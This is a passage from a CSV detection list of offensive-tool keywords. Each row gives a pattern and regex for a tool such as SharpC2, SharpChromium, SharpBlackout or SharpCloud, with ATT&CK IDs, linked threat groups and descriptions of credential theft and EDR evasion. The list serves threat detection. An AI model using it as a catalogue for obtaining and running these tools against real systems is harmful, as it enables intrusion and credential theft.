T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","N/A","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","58824" "*SharpAzbelt-main*",".{0,1000}SharpAzbelt\-main.{0,1000}","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. 
It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery","https://github.com/redskal/SharpAzbelt","1","1","N/A","N/A","8","1","26","7","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z","58825" "*SharpBlackout* -p *",".{0,1000}SharpBlackout.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58826" "*SharpBlackOut.csproj*",".{0,1000}SharpBlackOut\.csproj.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58827" "*SharpBlackout.exe*",".{0,1000}SharpBlackout\.exe.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58828" "*SharpBlackOut.pdb*",".{0,1000}SharpBlackOut\.pdb.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58829" "*SharpBlackOut.sln*",".{0,1000}SharpBlackOut\.sln.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58830" "*SharpBlackout-main*",".{0,1000}SharpBlackout\-main.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","N/A","10","1","83","20","2025-03-21T16:33:42Z","2023-08-23T14:16:40Z","58831" "*SharpBlock -*",".{0,1000}SharpBlock\s\-.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58832" "*SharpBlock.csproj*",".{0,1000}SharpBlock\.csproj.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58833" "*SharpBlock.exe*",".{0,1000}SharpBlock\.exe.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58834" "*SharpBlock.sln*",".{0,1000}SharpBlock\.sln.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","58835" "*SharpBruteForceSSH.cs*",".{0,1000}SharpBruteForceSSH\.cs.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","58836" "*SharpBruteForceSSH.exe*",".{0,1000}SharpBruteForceSSH\.exe.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","1","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","58837" "*SharpBuster.AssemblyInfo.cs*",".{0,1000}SharpBuster\.AssemblyInfo\.cs.{0,1000}","offensive_tool_keyword","SharpBuster","This is a C# implementation of a directory brute forcing tool designed to allow for in-memory execution","T1087 - T1112 - T1048.003 - T1105","TA0007 - TA0040 - TA0002","N/A","N/A","Discovery","https://github.com/passthehashbrowns/SharpBuster","1","0","N/A","N/A","7","1","62","7","2020-09-02T15:46:03Z","2020-08-31T00:33:02Z","58838" "*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Use SharpBypassUAC e.g. 
from a CobaltStrike beacon","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","58839" "*SharpBypassUAC*",".{0,1000}SharpBypassUAC.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58840" "*SharpBypassUAC.exe*",".{0,1000}SharpBypassUAC\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58841" "*SharpC2 *",".{0,1000}SharpC2\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58842" 
"*SharpC2*.cs*",".{0,1000}SharpC2.{0,1000}\.cs.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58843" "*SharpC2*.exe*",".{0,1000}SharpC2.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58844" "*sharpc2*client-windows.zip*",".{0,1000}sharpc2.{0,1000}client\-windows\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58845" "*SharpC2.*",".{0,1000}SharpC2\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58846" "*SharpC2.API*",".{0,1000}SharpC2\.API.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58847" "*SharpC2Event*",".{0,1000}SharpC2Event.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework 
written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58848" "*SharpC2Hub*",".{0,1000}SharpC2Hub.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58849" "*SharpC2Webhook*",".{0,1000}SharpC2Webhook.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","58850" "*SharpCalendar.exe*",".{0,1000}SharpCalendar\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike",".NET Assembly to Retrieve Outlook Calendar Details","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - 
Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCalendar","1","1","N/A","N/A","10","10","13","1","2021-10-07T19:42:20Z","2021-10-07T17:11:46Z","58851" "*SharpCat.exe*",".{0,1000}SharpCat\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - 
NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","N/A","10","10","16","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z","58852" "*SharpChisel*",".{0,1000}SharpChisel.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","58853" "*SharpChisel.exe*",".{0,1000}SharpChisel\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58854" "*SharpChrome backupkey *",".{0,1000}SharpChrome\sbackupkey\s.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","58855" "*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58856" "*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","SharpChrome","executables for penetration testing Windows Active 
Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpChrome","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","58857" "*SharpChrome backupkey*",".{0,1000}SharpChrome\sbackupkey.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58858" "*SharpChrome* backupkey *.pvk*",".{0,1000}SharpChrome.{0,1000}\sbackupkey\s.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","58859" "*SharpChrome.cs*",".{0,1000}SharpChrome\.cs.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58860" "*SharpChrome.exe*",".{0,1000}SharpChrome\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58861" "*sharpchromium *",".{0,1000}sharpchromium\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - 
TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","58862" "*SharpChromium.csproj*",".{0,1000}SharpChromium\.csproj.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58863" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58864" "*SharpChromium.exe*",".{0,1000}SharpChromium\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58865" "*SharpChromium.sln*",".{0,1000}SharpChromium\.sln.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58866" "*SharpChromium-master*",".{0,1000}SharpChromium\-master.{0,1000}","offensive_tool_keyword","SharpChromium",".NET 4.0 CLR Project to retrieve Chromium data such as cookies - history and saved logins.","T1555.003 - T1114.001 - T1555.004","TA0006 - TA0003","N/A","COZY BEAR","Credential Access","https://github.com/djhohnstein/SharpChromium","1","1","N/A","N/A","10","8","712","100","2020-10-23T22:28:13Z","2018-08-06T21:25:21Z","58867" "*SharpClipboard.exe*",".{0,1000}SharpClipboard\.exe.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","58868" "*SharpClipboard-master.zip*",".{0,1000}SharpClipboard\-master\.zip.{0,1000}","offensive_tool_keyword","SharpClipboard","monitor the content of the clipboard 
continuously","T1115","TA0006 - TA0009","N/A","N/A","Credential Access","http://github.com/slyd0g/SharpClipboard","1","1","N/A","N/A","8","1","N/A","N/A","N/A","N/A","58869" "*SharpClipHistory*",".{0,1000}SharpClipHistory.{0,1000}","offensive_tool_keyword","SharpClipHistory","SharpClipHistory is a .NET 4.5 application written in C# that can be used to read the contents of a users clipboard history in Windows 10 starting from the 1809 Build.","T1115 - T1113 - T1015 - T1053 - T1059","TA0003 - TA0007","N/A","N/A","Reconnaissance","https://github.com/FSecureLABS/SharpClipHistory","1","1","N/A","N/A","N/A","2","194","32","2020-01-23T13:39:13Z","2019-04-25T22:17:08Z","58870" "*sharpcloud.cna*",".{0,1000}sharpcloud\.cna.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58871" "*SharpCloud.csproj*",".{0,1000}SharpCloud\.csproj.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58872" "*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58873" 
"*SharpCloud.exe*",".{0,1000}SharpCloud\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","58874" "*SharpCloud.sln*",".{0,1000}SharpCloud\.sln.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58875" "*SharpCloud-master*",".{0,1000}SharpCloud\-master.{0,1000}","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","N/A","10","2","171","29","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z","58876" "*SharpCOM.exe*",".{0,1000}SharpCOM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
